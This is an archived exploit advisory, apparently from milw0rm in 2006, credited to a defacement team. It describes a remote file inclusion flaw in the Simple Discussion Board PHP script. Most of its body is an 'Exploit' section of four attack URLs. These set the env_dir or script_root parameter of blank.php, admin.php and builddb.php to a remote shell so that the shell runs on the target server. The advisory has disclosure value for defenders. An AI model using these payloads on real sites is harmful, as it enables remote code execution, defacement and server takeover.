21 lines
No EOL
535 B
Text
21 lines
No EOL
535 B
Text
Simple Discussion Board Multiple F.le Inclusion Vulnerability
|
|
|
|
credit: CeNGiZ-HaN
|
|
mail: cengiz-han@system-defacers.org
|
|
team: www.system-defacers.org
|
|
Script: Simple Discussion Board (sdb)
|
|
Download Adress:http://prdownloads.sourceforge.net/sdb/sdb-0.1.0.tar.gz
|
|
class: Remote
|
|
Risk: High
|
|
|
|
Exploit:
|
|
|
|
http://[target]/[path]/blank.php?env_dir=shell
|
|
http://[target]/[path]/blank.php?script_root=shell
|
|
http://[target]/[path]/admin.php?env_dir=shell
|
|
http://[target]/[path]/builddb.php?env_dir=shell
|
|
|
|
|
|
GreeTz No One ;)
|
|
|
|
# milw0rm.com [2006-09-19] |